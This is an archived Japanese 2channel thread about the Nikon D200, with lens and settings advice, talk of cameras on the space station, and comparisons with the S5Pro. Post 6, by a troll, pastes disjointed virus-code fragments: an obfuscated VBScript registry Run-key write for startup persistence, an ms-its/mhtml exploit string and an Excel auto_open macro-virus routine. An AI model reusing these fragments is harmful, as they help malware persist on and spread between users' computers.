5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Nikon D200 Part82

1 :名無CCDさん@画素いっぱい:2006/12/13(水) 21:50:33 ID:RhmfNcTj0
前スレ

Nikon D200 Part81
http://hobby7.2ch.net/test/read.cgi/dcamera/1162296643/

2 :名無CCDさん@画素いっぱい:2006/12/13(水) 21:54:22 ID:GjmTEph20


3 :名無CCDさん@画素いっぱい:2006/12/13(水) 21:54:29 ID:3w9qYFic0
乙じゃけぇ。

4 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:08:54 ID:/BS4tv2u0
4


5 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:16:28 ID:SMVPSWF60



6 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:25:54 ID:71nlkpg70
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:43:01 ID:7qe3y0d20
何か変態野郎が余計な事をしているようだが気にせず >>1乙カレー

8 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:46:55 ID:71nlkpg70
【ニコ爺はだから嫌われる!】
【初期不良を訴えた人を基地外&キヤノネット扱いして不具合を無視w】
【本当にユーザーなら証拠画像をうpしろと罵倒するものの、うpして証明されたら沈黙www】

807 名前:名無CCDさん@画素いっぱい[] 投稿日:2006/12/13(水) 16:01:14 ID:lfEAwZGWO
2日程前に買った者ですが今朝触ったら正常な動作をしてくれません;;
落としたり手荒な扱いもしていないし思い当たるは何にもないです
取説読んでいて当てはまる事といえば…もしかして強い電波・磁気を発生する携帯電話&PCの側に置いておいたのが原因か!?
orz
もう生きていけない…

808 名前:名無CCDさん@画素いっぱい[] 投稿日:2006/12/13(水) 16:07:40 ID:58zGN3j4O
バッテリー抜き差ししてみた?

809 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 16:33:12 ID:lfEAwZGWO
>>808
駄目です;;うんともすんとも言いません
修理にとりあえず出しますが高いようならもうお手上げです

さっきサポセンに電話したら
やはり(?)携帯電話の側はよくないらしく、結構故障の問い合わせが殺到してるみたいです
そんなんだったら最初に買う時に言っておいてほしかったよ…店員さんorz

しかし携帯電話の側で簡単に壊れる一眼デジは初めてです

810 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 16:34:42 ID:Ejd11WEX0
なこたーない。
ケータイで壊れるカメラなんて始めて聞いた。
電池切れか低温すぎるかメディアの不良あたりが怪しい。


9 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:47:28 ID:71nlkpg70
【ニコ爺はだから嫌われる!】
【初期不良を訴えた人を基地外&キヤノネット扱いして不具合を無視w】
【本当にユーザーなら証拠画像をうpしろと罵倒するものの、うpして証明されたら沈黙www】

811 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 16:51:43 ID:laS8g0Jh0
>>810
というか、完全にキャノネットの釣りだってば。
今、俺カスタマーサービスに電凸してみた。

Q、「D80を携帯電話の側に置いて故障したという問い合わせが殺到してる」と言うのは本当ですか?
A、聞いておりません

購入後2日なら初期不良で取り替えてもらえるし、そうでなくても保証で修理が効くのに、
「修理にとりあえず出しますが高いようならもうお手上げです」って言うバカがどこにいる。

最近キャノネットも質が落ちたな。激しくつまらん。

812 名前:名無CCDさん@画素いっぱい[] 投稿日:2006/12/13(水) 17:05:10 ID:lfEAwZGWO
修理費に関してはこっちが馬鹿だった
が、あんた達は壊れてなあからそんな無責任でいい加減な呑気な事言えるんだよ!
何がキノネットだ!
私は普通の一般人だ!馬鹿!!
兎に角取説を読んでめろ!馬鹿!
ちゃんと「強い電波や磁気の発生する場所は良くない」と記載されているだろうが!!!!
目腐れ!
壊れた俺の身にもなれ!
俺に言わせたらあんた達の方が遥かぬ関係者臭い!
電池は満タンだし温度差の激しく部屋でもない!!見たような勝手なこと言うな!!!
こんなもん買うんじゃなかったよ!!
初期無料とか関係ないんだよ!!!!!
気分も何もかも最悪だよ!あー腹立つ!!!!!

10 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:48:40 ID:71nlkpg70
【ニコ爺はだから嫌われる!】
【初期不良を訴えた人を基地外&キヤノネット扱いして不具合を無視w】
【本当にユーザーなら証拠画像をうpしろと罵倒するものの、うpして証明されたら沈黙www】

813 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 17:07:43 ID:I3ug+B8v0
このファビョり方、確かに工作員ではないようだ。
本物のk

814 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 17:24:12 ID:UMhSRC4J0
強烈な電磁波を発する携帯電話wの使い過ぎで、脳にも支障をきたしたんじゃね?

815 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 17:30:04 ID:HWOCwQiiO
むしろ本人が電波ry

816 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 17:58:35 ID:8ehpWzV40
キチガイって怖いですね。
とりあえず買った証拠となる写真でも
うpしてくれませんかね?
話はそれからね。

817 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 18:30:13 ID:lfEAwZGWO
基地外呼ばわりするなら
それなりの納得のできるまともな見解と意見を書け!

http://j.pic.to/8reai

11 :名無CCDさん@画素いっぱい:2006/12/13(水) 22:49:16 ID:71nlkpg70
ニコ爺はだから嫌われる!】
【初期不良を訴えた人を基地外&キヤノネット扱いして不具合を無視w】
【本当にユーザーなら証拠画像をうpしろと罵倒するものの、うpして証明されたら沈黙www】

818 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/13(水) 18:54:27 ID:8ehpWzV40
買ったお店に持っていって相談したほうが
よろしいのではないでしょうか?
新品と交換してくれると思いますよ。
残念ながら不良品だと思われますし
交換してくれない店があるなら
その店のほうが異常だと思います。

819 名前:名無CCDさん@画素いっぱい[] 投稿日:2006/12/13(水) 19:37:35 ID:6C3hEs8+0
D80やD200などカメラバックに入れ、同時に携帯も一緒にカメラの背面近くに
いれているが、今までなんとも無い。

おそらくは807は夢遊病の類を現実と判断がつかなくたっているのでしょう。

820 名前:名無CCDさん@画素いっぱい[] 投稿日:2006/12/13(水) 19:48:27 ID:lfEAwZGWO
つまり買った機体が不良品だっただけで
携帯電話とは何の因果関係もないと?

兎に角言われた通り素直に持って行く事にするよ。
さっきも書いたけど
取説にはキチンと電波・磁気について記載してある。
その事を又サポセンの人に言ったら、ただただ漠然と強い電波・磁気云々としか言わないから
こちらが、ではどれぐらいの「強さ」と「距離」なら影響を受け、記載されている症状が起こるのか?と聞いても答えられない始末…

携帯電話の影響が全くないと言い切れるのか?
と言ったら、ただただ謝り倒して購入した店での返品を進めてきたよ…。
俺も確かに言われても仕方ない人間だけど
Nikonがいい加減で無責任な商売をしているメーカーなのかはよく思い知らされた。

12 :名無CCDさん@画素いっぱい:2006/12/13(水) 23:03:35 ID:71nlkpg70
15年以上昔の遠い記憶なんだが
何かの本で植村直己が南極大陸を横断した時に使った
カメラの話を思い出した。
どんなカメラを持って行っても壊れてしまうので
カメラメーカに相談に行ったんだとか。
カメラメーカも宣伝になると考えたのか承諾したのだが
植村から言われたスペックに仰天し
死ぬ思いで耐久性上げたって話だったと思う。

デコボコした氷の上を犬ぞりで毎日ドッカンドッカン乗り越えるから
落下試験がムチャ過酷。なにせ1m超える落差もザラで
それが1年以上繰り返される訳で。
さらにマイナス30℃以下の寒さではグリスもオイルも堅くなって、
微細なカメラの力では動かないとか。

Nっていうメーカーのカメラを持っていったら、
犬ぞりの振動でマウントが根元から折れたそうです。
冒険終了後(どこに行ったかは失念)ベースキャンプに戻ってきたら
記者達に囲まれて写真をバシャバシャ。そのカメラがキヤノンだらけだったので
カメラマンに聞いたらキヤノンのカメラは壊れないからと返事されて興味を持ち、
キヤノンに壊れないカメラ作れない?と依頼しに来たそうだ。

どの位の振動ですか?と技術者が聞いたら、これくらいですよと、
何かの箱を階段の上から落としたそうだ。恐ろし。

趣味のキヤノンカメラというムックに掲載されてたはず。

13 :名無CCDさん@画素いっぱい:2006/12/13(水) 23:17:36 ID:R+Qmyw8YO
↑こいつそうとう脳味噌かゆいんだろうね。

あ、>>1おつ

14 :名無CCDさん@画素いっぱい:2006/12/13(水) 23:25:47 ID:z862SSUF0
脳味噌かゆいとつらいだろうねw

>>1

15 :テンプレ:2006/12/13(水) 23:37:08 ID:GIwDV/k90
【推奨の設定変更】

RAW:初期:非圧縮 → 時間の点でもファイルサイズの点でも無駄なので「圧縮」が推奨。

再生時:十字ボタンの中央押しで一発拡大(規定の任意の倍率・再度押すと元に戻る)が便利。 カスタム f1

ISO感度や露出の設定ステップ幅:「補正」のステップ幅とは別に設定できる。

「露出ディレイモード」:旧「低振動モード」。2秒セルフと組んで、ケーブルスイッチ代わり。

【AF関係設定】鳥撮りの人のばあいの一例
AF-C
背面のレバーは下から3番目の菱形みたいの
カスタマイズのa3をワイドフレーム(7点)
a5を弱かオフ

追加情報募集中


16 :名無CCDさん@画素いっぱい:2006/12/13(水) 23:37:31 ID:71nlkpg70
だれか早く殺してくれよ

17 :テンプレ:2006/12/13(水) 23:38:12 ID:GIwDV/k90
【テンプレ案・メディア編】
メディアの速度
カメラ内のバッファによる「初期高速連写」はメディアの速度とは無関係。
初期高速連写以後の撮影間隔が「メディアの書き込み速度」に応じる。
「書き込みの終了」まで所要時間も変わるものの、記録中の再生やメニュー表示が速いので、
「終わるまで待つ必要がないから実用的には関係ない」
当然、速いほうが単位時間あたりの撮影可能枚数が増えるものの、よほど大量に連写するのでないなら、
ある程度以上の「書き込み速度」が確保されていれば支障が出ないことも珍しくない。
ただし、メディアが大きくなるほど「読み込み(メディアからパソコンやストレージへの転送)」の
速度の影響も大きくなるから、「これから買うなら読み書きともになるべく速いタイプが有利」とはいえる。

サイズは、少なくとも1GB。なるべく4GB以上。
あまりに小さいと、頻繁に入れ替える必要が生じて落としたりするとか、撮影済みのものを取り違えて
誤ってフォーマットしたりするリスクが生ずる反面、あまり大きいとたった1枚の紛失等のダメージが
膨大になるし、パソコンや携帯ストレージへの転送の時間が止め処もなく延びる。
どうしても入れ放しで使う必要がある条件でないなら、ある程度のサイズに抑えるほうが無難という説もある。

連写速度
速すぎるのでどう考えても勿体ないから、並みの連写速度のもののように気軽に比較テストしにくいという難点がある。

RAWの場合でも、「基準メディア」のサンのU2で40コマ/30秒くらい。
「価格」で変な風評が流れている虎の×120(2GB4GB)でもほぼ同様。

補足訂正追加よろしく。


18 :テンプレ:2006/12/13(水) 23:38:46 ID:GIwDV/k90
【D200のRAW対応ソフト】
【フリーないし追金無しのもの】
「純正」
ピクチャープロジェクト(セット品)
ニコンビュー(ダウンロード・ピクチャープロジェクトと両立できないんだっけ)

Rawshooter(有料版もあるんだっけ)

【有料ソフト】
ニコンキャプチャ
キャプチャーNX
フォトショップ各種
ペイントショップ
Silkypix
Ulead PhotoImpact11
DxO Optics Pro
Digital Photographer for WIN
デジカメNinja X for WIN
ステライメージVer.5
デイジーコラージュ9
Bibble Pro

何か増えてる?


19 :テンプレ:2006/12/13(水) 23:41:39 ID:GIwDV/k90
【PC】
PC:CPUはなるべく速く、HDDをなるべく多く内蔵追加でき、メモリを少なくとも1GBを越えて設置できるものが有利。
というか、ほとんど必須。
ディスプレーは、なるべく良質のものが有利。
結果としてノートは不利。
タワー+良質のディスプレーが一番割安。

【データのPC用追加ストレージ】
容量と速度の点で、USB2などの外付けHDDが現実的。
タワーならSATAなどの差し替え式トレーも便利。

リムーバブルは何かな? RAWも保存するなら、5GB弱のDVD記録型でも小さすぎるし遅いので使いにくい。
JPEGだけなら、CD-Rでも行けるかな。
いずれにしても、もっと速くて大きいのが出たら当然代替え。

【データのポータブル(携帯用)ストレージ】
参考スレ http://hobby7.2ch.net/test/read.cgi/dcamera/1161400974/

PD-70X : 定番だと思う という話がある。

ビューワ兼用ストレージ
エプソンP-6000:やや高いけど、画面も大きいし、表示速度も割と速いし、コピーも速い。
P-2000/4000はそれと比べるとちと遅い。
何かあるかな?


20 :テンプレ:2006/12/13(水) 23:43:18 ID:GIwDV/k90
望遠ズーム
VR70-200:この焦点距離域で写りに拘るなら無理して買っても損はない。
80-200/2.8:値段のわりに良い写り、敢えてVR70-200を選ばす、こっちを購入するのもあり
200-400/4:鳥屋さん・飛行機屋さんの最終目標
シグ70-200DG:写りはVRに匹敵、VR不要なら行ける 最短撮影距離がいまいち
シグ70-200マクロ: 知らんけど、マクロ域は甘いとかいう。
シグ100-300/4:思いの外シャープ お値段も手頃でAF-S300/4より安い
トキナー100-300/4:シグと互角。比較してホールディングとボケがいい。
VR80-400: 暗いのが難点 その分価格は安いが
シグ50-150:写りは知らんけど明るさの割にコンパクトではある
トキナー50-135:知らん。

【推奨レンズ追加(なるべく実写例付き)募集中】


21 :テンプレ:2006/12/13(水) 23:44:50 ID:GIwDV/k90
標準ズーム (個体差があり得るので注意)
17-55:値段だけは有る、解像感高い、その一方、適当に撮ると18-70との差が見えて来ない。
28-70:ワイド端が・・・銀塩と共用なら。
18-200:写りは18-70より上、特に中央部の写りは大口径に迫るものが有る、しかし高倍率故周辺はかなり甘い、VR4段の威力は凄く常用になりえる
18-70:可もなく不可もなく、最短撮影距離が長いのと、ワイド端の歪みが気になる。
28-105:マクロも使える隠れた銘レンズ ワイド端が狭い。
35-70/2.8:隠れた銘レンズ 切れが有る絵 直進式なのはご愛敬
24-120VR:積極的には勧められない、銀塩と共用なら・・・
シグ17-70:かなり良く写るしマクロといえる最短撮影距離は便利。
シグ18-200 タム18-200:VR18-200が有る現在、敢えて選ぶ意味は?
タム17-35:2倍で無理のない設計、風景撮りには最高、F値が変わるのがちょっと
タム28-75:開放ではソフトな描写、F4まで絞るとかなりシャープ しかも色乗り最高


22 :テンプレ:2006/12/13(水) 23:47:07 ID:GIwDV/k90
テンプレ案・レンズ編 (いずれも個体差があるので注意)
【超広角ズーム】
純正12-24:トキナーより解像感が若干上、AF-Sも良い
トキナー12-24:AF-Sを除けば純正に迫る
シグマ10-20:個体差かも知れないがいまいちカチッとしない。ただし10〜と12〜はけっこう違う
シグマ12-24:銀塩と共用なら、これしかない
タムロン11-22:個体差かも知れないが写りは悪くない 鏡胴がしょぼいが軽い
トキナー10-17フィッシュアイズーム:個体差もあると思うがユニークなだけでなくて良く写る。ただし用途は限定される

マ(イ)クロ
60/2.8:物撮に最適なカチッとした描写
シグ50/2.8DG:安価な割に性能も良好 「とりあえず試し」以上の価値あり
VR105/2.8:むにゃむにゃむにゃ
タム90/2.8:ボケの綺麗さは定評がある 鏡胴はしょぼい。
シグマ105/2.8 トキナー105/2.8:知らんけどシャープネスとボケの兼ね合いで違いがあるとか。
70-180:ユニークなだけでなくて写りも良いし使い勝手も良好。近距離以外の後ボケが良くないので汎用には辛い。生産終了。


23 :テンプレ:2006/12/13(水) 23:47:51 ID:GIwDV/k90
【レンズテンプレ案・単焦点編】
AF
※明るい広角単焦点のDXが切望される
Ai AF Nikkor 28mm F1.4D
Ai AF Nikkor 28mm F2.8D
Ai AF Nikkor 35mm F2D・・・準「定番」
Ai AF Nikkor 50mm F1.4D
Ai AF Nikkor 50mm F1.8D・・・ボケがイマイチ良くない。
Ai AF Nikkor 85mm F1.4D(IF)・・・「定番」
Ai AF Nikkor 85mm F1.8D.  円形絞りでないのが非常に惜しい優良レンズ。
Ai AF DC Nikkor 105mm F2D
Ai AF DC Nikkor 135mm F2D
Ai AF Nikkor ED 180mm F2.8D(IF)・・・「定番」
Ai AF-S Nikkor ED 300mm F4D(IF)・・・「定番」
シグマ30mm F1.4 EX DC HSM

非AF
ツァイスPlanar T* 1.4/50 ZF
Planar T* 1.4/85 ZF

レポート募集
推奨を追加する場合は、受け売りではあまり意味がないので、原則として「ユーザーが作例付きで」。


24 :名無CCDさん@画素いっぱい:2006/12/14(木) 11:45:02 ID:iiREhEnR0
http://spaceflight.nasa.gov/gallery/images/station/crew-14/hires/iss014e08795.jpg

宇宙へ行ったD200

25 :名無CCDさん@画素いっぱい:2006/12/14(木) 13:21:24 ID:UgQDFLqA0
>>23
Fujinon?

26 :名無CCDさん@画素いっぱい:2006/12/14(木) 16:32:35 ID:EoU9H1juO
>>23
distagon 2/35 ZF がネーヨ…distagon 2.8/28 ZF も来年1月発売だお

27 :名無CCDさん@画素いっぱい:2006/12/14(木) 16:35:23 ID:EoU9H1juO
間違えたorz

×distagon 2.8/28 ZF
〇distagon 2.8/25 ZF

28 :名無CCDさん@画素いっぱい:2006/12/14(木) 21:41:49 ID:3OVleHEU0
>>24
確かに飛行士の頭から右の方にバッテリーグリップ付きD200が後ろ向きに見えるな。
その下にiPodがある。

29 :名無CCDさん@画素いっぱい:2006/12/15(金) 00:35:34 ID:MYCx3RRG0
>>24
おおーすげー。

30 :名無CCDさん@画素いっぱい:2006/12/15(金) 00:45:32 ID:RMkR+1pL0
>>28
ちゅうか、股間にでかでかと

31 :名無CCDさん@画素いっぱい:2006/12/15(金) 00:46:58 ID:RMkR+1pL0
それにしても、カメラボディが少なくとも3台、
レンズもゴロゴロしているけど、
宇宙船の中って、こんなもんなのか?

32 :名無CCDさん@画素いっぱい:2006/12/15(金) 00:51:39 ID:RMkR+1pL0
>>31
これ、少なくと無重力状態じゃないな

33 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:05:39 ID:M9CmhIFn0
>>32
いくつかのボディやレンズは、ベルクロ・テープとか使って壁に止めてあるんじゃない?
重力あったら落ちてくると思う。

34 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:15:58 ID:RMkR+1pL0
>>33
でも、無重力だったら、
飛行士手元の眼鏡ケース(?) とか、
机の下のビニール袋は、浮遊しちゃうと思うぞ。




35 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:18:29 ID:RMkR+1pL0
>>34
ごめん。無重力だった。

http://spaceflight.nasa.gov/gallery/images/station/crew-14/html/iss014e08795.html

眼鏡ケースは、両面テープでも張ってあるんだろうね。

36 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:42:48 ID:XLOb2zqR0
VR18-200もここでは自重で伸びたり痴人ダリしないんだろうなあ。

37 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:51:47 ID:RMkR+1pL0
>>35
何で、こんなにカメラ機材が転がっているのか、
気になって、NASA のページを色々と見て回ってみた。
どうやら、宇宙ステーションから、船外を撮影するみたい。

http://spaceflight.nasa.gov/gallery/images/station/crew-15/html/jsc2006e41641.html

これは、地上での訓練風景。これもニコン?

38 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:53:26 ID:RMkR+1pL0
そういえば、このカメラは、海上自衛隊のトップページにも載ってたな。

http://spaceflight.nasa.gov/gallery/images/station/crew-15/hires/jsc2006e41640.jpg

39 :名無CCDさん@画素いっぱい:2006/12/15(金) 01:57:37 ID:RMkR+1pL0
どうやら、宇宙では F5 が常用みたいだ

http://spaceflight.nasa.gov/gallery/images/station/crew-10/hires/jsc2004e23464.jpg

40 :名無CCDさん@画素いっぱい:2006/12/15(金) 02:01:15 ID:RMkR+1pL0
撮影するのは、船外じゃなくて、船内での実験の結果みたい

http://spaceflight.nasa.gov/gallery/images/station/crew-10/hires/iss010e06638.jpg

41 :名無CCDさん@画素いっぱい:2006/12/15(金) 02:04:44 ID:RMkR+1pL0
いや、F5 で、地球も撮ってる。原始的だ。
http://spaceflight.nasa.gov/gallery/images/station/crew-10/hires/iss010e10582.jpg

42 :名無CCDさん@画素いっぱい:2006/12/15(金) 02:06:08 ID:kyeMe+eI0
S5Pro発売に合わせて、ニコンが新機種ぶつけてくるという噂をMIXIでひろってきたんだけど、
どなたか知ってます?
チラシの裏ってことで。


43 :名無CCDさん@画素いっぱい:2006/12/15(金) 02:13:56 ID:RMkR+1pL0
>>42
ハニカムのフルフレームという噂

44 :名無CCDさん@画素いっぱい:2006/12/15(金) 03:53:39 ID:UHYSzAB90
>>41
F5っていうか、KodakのCCDをつけたNikonのOEMなのでわ??
野口さんが持って行ったのもそうだったし(600万画素、多分フルサイズ)。
型番失念(日本では販売してない)。

45 :名無CCDさん@画素いっぱい:2006/12/15(金) 09:07:41 ID:YVt/KKrm0
>>44
これ?
ttp://ascii24.com/news/i/topi/article/2001/06/29/627468-000.html
ttp://iss.sfo.jaxa.jp/iss_faq/faq_env_12.html

46 :名無CCDさん@画素いっぱい:2006/12/15(金) 11:33:19 ID:IiOr7rRh0
野口さんはD2Xだったし

47 :名無CCDさん@画素いっぱい:2006/12/15(金) 13:37:53 ID:M9CmhIFn0
>>44
Kodak DCS760(F5ベース)が写ってるね。

48 :名無CCDさん@画素いっぱい:2006/12/15(金) 13:44:43 ID:M9CmhIFn0
ちなみにDCS760は135判じゃないよ。
135判は、F80系の部品使ったDCS Pro14/n、DCS Pro SLR/n。

49 :599:2006/12/15(金) 14:15:33 ID:1WBjuz8B0
F5 も使われているみたいね。
http://www.nikon.co.jp/main/jpn/whatsnew/2000/f5eva_00.htm

もっと積極的にCMなどに使えば、訴求すると思うのだけど、
NASA の縛りがあるんだろうな。

50 :名無CCDさん@画素いっぱい:2006/12/15(金) 16:27:10 ID:bfy6HQWt0
D200の購入を考えているんだけど、
来月のS5proの気になってます。

vs S5pro という観点で
D200 の方がよい部分って何でしょう。

あんまり人を撮ることなくて(全く無いってこともないけど)
風景や花、虫、鳥、動物を撮ることが多いです。



51 :つばくろん ◆rPMXZhdNas :2006/12/15(金) 16:44:00 ID:j7uu79vV0
>D200 の方がよい部分って何でしょう。

いままでなら画質以外の部分って言えたけど今回は完全敗北じゃないかしら。
しいていえば解像度がわずかに上回りそうとか。


52 :50:2006/12/15(金) 16:49:34 ID:bfy6HQWt0
レス、ありがとう。

やっぱり若干の高解像、連射性能(画像サイズの小ささ)ぐらいが
D200の勝る部分ですかね。あと値段。

こうなるとD200を選ぶ場合は、
S5pro発売された後にした方が中古も含めて価格相場は下がりそうですね。


53 :名無CCDさん@画素いっぱい:2006/12/15(金) 16:50:18 ID:ii4UDEqM0
>>50
連射機能

54 :つばくろん ◆rPMXZhdNas :2006/12/15(金) 16:52:22 ID:j7uu79vV0
S5Proが人々の想定よりもかなり高かったんで、D200の値段はあんまり影響なさそう。


55 :名無CCDさん@画素いっぱい:2006/12/15(金) 16:55:30 ID:M9CmhIFn0
>>50
ボディだけを見ると、連写性能が必要な人にはD200の方がアドバンテージがありますね。
画質については様々なサンプルが出てくるまではっきりしたことはいえませんが、
おおむねS5Proの方が(発色など日本人の多くに)好まれる絵になるのではないか
と想像しています。ただし解像'感'については未知数です。

またシステムとしてみた場合は、後処理ソフトウエアが大きく異なりますね。
あとはサポート体制とかそういったところの比較になるのでは無いでしょうか?

56 :50:2006/12/15(金) 17:01:46 ID:bfy6HQWt0
引き続きレス有難うございます。

あぁそうか、Caputure NX使えないんですね。
サポートとか撮った後のことも考える必要ありですね。

価格はあんまり影響ないですか。
中古相場ならD200売ってS5pro買う人のおかげで
タマが増えて下がったりしないかな。


57 :名無CCDさん@画素いっぱい:2006/12/15(金) 17:35:28 ID:JaGdUPj/0
実は、S5proはD200の上位機種としてNikonのラインナップに組み込むというのは、暗黙の了解の内とか?

58 :名無CCDさん@画素いっぱい:2006/12/15(金) 22:38:34 ID:7h8kBaLj0
鑑定お願いします。
結構気に入ってる一枚だけど。
http://provyake.jog.buttobi.net/usr/bin/perl/cgi-bin/img-box/img20061212235528.jpg

明るい作品。
http://provyake.jog.buttobi.net/usr/bin/perl/cgi-bin/img-box/img20061213165726.jpg

かっぱ橋。
http://provyake.jog.buttobi.net/usr/bin/perl/cgi-bin/img-box/img20061213110941.jpg

これは?
http://blogimg.goo.ne.jp/user_image/46/db/fe0149d2f07cf2e2a4ae8ed698144dd9.jpg

59 :名無CCDさん@画素いっぱい:2006/12/15(金) 22:46:24 ID:p6CZEY/B0
明日、ボーナスで待望の D200 を購入予定です。
今から楽しみで仕方ないです。
S5Pro も一瞬気になったけど、CCD が富士独自ですか。
やっぱり欲しい時が買い時ということで。(笑)

60 :名無CCDさん@画素いっぱい:2006/12/15(金) 23:49:17 ID:7h8kBaLj0
これが現在最高レベルの技術を駆使してレタッチされた作品。
http://provyake.jog.buttobi.net/usr/bin/perl/cgi-bin/img-box/img20061215200353.jpg

現在、日本でこのレベルの作品がつくれるのはそれほど多くない。
おれは第一人者だと自覚している。

61 :名無CCDさん@画素いっぱい:2006/12/15(金) 23:55:39 ID:5B+dtkpM0
>>59
正解 おめ

62 :名無CCDさん@画素いっぱい:2006/12/15(金) 23:58:30 ID:MYCx3RRG0
>>60
ワロタw

63 :名無CCDさん@画素いっぱい:2006/12/16(土) 08:24:33 ID:dqrbNqrz0
>>58
構図が少し。。

64 :44:2006/12/16(土) 09:17:44 ID:tq1nZO+m0
>>45-48
レスありがとうです。
Fifth Star の管理人日記に、去年、機種名と「なんだ、NikonのOEMか。」
と書いてあったのを覚えてたのですよ。
上記ブログを読み返しても該当コメントが出てこず。
漠然とKodakの3桁型番だったことだけ^^;;
当時は私個人的にはCCDサイズをあまり意識してなかったので。
もっともNikonD70(その後D200)を使ってるので焦点距離換算1.5倍の画角
ってのはわかってましたが。←蛇足。
しかしNikonがこれほど宇宙で活躍してるとは。

65 :44:2006/12/16(土) 09:20:23 ID:tq1nZO+m0
書き忘れましたが、DCS760でまず間違いないです。

66 :名無CCDさん@画素いっぱい:2006/12/16(土) 09:51:59 ID:1NMvZ3rgO
今、D70で鉄や子供のサッカーを撮っている。
嫁との買い換え交渉が成立したが、フルの噂とか後継考えるとなかなか踏ん切りがつかない…
用途からいってD200しかないのだが、誰か背中押してくれ。
新ファームとかどうですか?
なお、30Dは興味なし、IDは1Nだけど(w


67 :名無CCDさん@画素いっぱい:2006/12/16(土) 10:08:51 ID:YalpbSzG0
>>66
じゃあ、背中を押してあげよう


   , /⌒⌒γ⌒、
  /      γ  ヽ
  l       γ   ヽ
 l   i"´  ̄`^´ ̄`゛i |
 |   |         | |
 ヽ  / ,へ    ,へ ヽ./
  !、/   一   一 V
  |6|      |     .|
  ヽl   /( 、, )\  )    / ̄ ̄ ̄ ̄ ̄ ̄
   |   ヽ ヽ二フ ) /  <  D200 買えや!
   丶        .ノ     \______
    | \ ヽ、_,ノ
   . |    ー-イ

68 :名無CCDさん@画素いっぱい:2006/12/16(土) 10:27:04 ID:jz1rvaDV0
>>66
押すってか「突き落とす」w

欲しい時が買い時!いってらっしゃい
新ファームで高感度ノイズが良くなったとか言われているが俺は違いがわかんない。
s付きが出たとしても小変更程度だろうから、D2Xみたくファームで充分同等性能になるのではなかろうか?




               ○  ホレ
               く|)へ
                〉  ガッ
  _,,..-―'"⌒"~ ̄"~⌒゙゙"'''ョ   ヾ○シ
 ゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ   ヘ/   >>66
 T  |   l,_,,/\ ,,/l  |    ノ
 ,.-r '"l\,,j  /  |/  L,,,/
 ,,/|,/\,/ _,|\_,i_,,,/ /
 _V\ ,,/\,|  ,,∧,,|_/


69 :66:2006/12/16(土) 10:44:00 ID:1NMvZ3rgO
>67-68
ありがとう
今週は勤務なので来週あたりD200逝ってきます

70 :名無CCDさん@画素いっぱい:2006/12/16(土) 11:27:11 ID:jz1rvaDV0
(`Д´)ゞビッ!! w

ゲット報告待ってまつ

71 :名無CCDさん@画素いっぱい:2006/12/16(土) 11:32:36 ID:tq1nZO+m0
>>66
D200所持者で鉄として突き落とすレスを少し。
高輝度ヘッドライトだと上下に睫が乗る。
スーパーはくとや新快速、電気機関車などの正面が被写界の大半(1/3以上)を
占めると画面が真っ暗でヘッドライトだけが写る。
D70でもRAWでNikon Captureで仕上げればA3プリントに耐えうる。

一方、買い換え(買い増し)のメリットとしては
ファインダーはD200に慣れるとD70には戻れない。
連射性能は言うまでもない。
カメラとしての質感、満足感は圧倒的に上。

72 :名無CCDさん@画素いっぱい:2006/12/16(土) 12:46:49 ID:LaYlfZAD0
>>66
>フルの噂とか後継考えるとなかなか踏ん切りがつかない…

買うタイミング逃してるPC購入者と同じだね。
(数ヶ月待てば、新機種出る〜 もっと性能良くなる〜 みたいな)

座布団の上に飾る訳でもなし。
頻繁に使うなら、今どう使うか?満足できるか? じゃねーの。

D200買って、フルサイズの新機種出たら下取り出して購入すればいいじゃん。
悶々としながら新機種出るまで待つか?
値段に手頃感が出てるD200買って、満足するまで使い込みして新機種待つか?

防湿庫に眠らせてしまう自己満足購入なら、何時かわからない新機種待てばいい。
今、D200買うなら、S5Proを候補に挙げるかも・・・・

73 :名無CCDさん@画素いっぱい:2006/12/16(土) 12:49:44 ID:tMCAgDFa0
431 名前:名無しさん@3周年[] 投稿日:2006/12/03(日) 12:52:46 ID:dHVgbGLW
昨日、NIKON D5Xsの中古の在庫が5万で出てたよ。
D4XsはISO64000だと結構ノイズが乗っているからあまりほしくない。

74 :名無CCDさん@画素いっぱい:2006/12/16(土) 12:51:59 ID:7ghzlWHD0
>>69
逝ってらっしゃ〜い。

ところで、D200発売から今日でちょうど1年ですなぁ。
http://www.nikon.co.jp/main/jpn/whatsnew/2005/1101_d200_01.htm
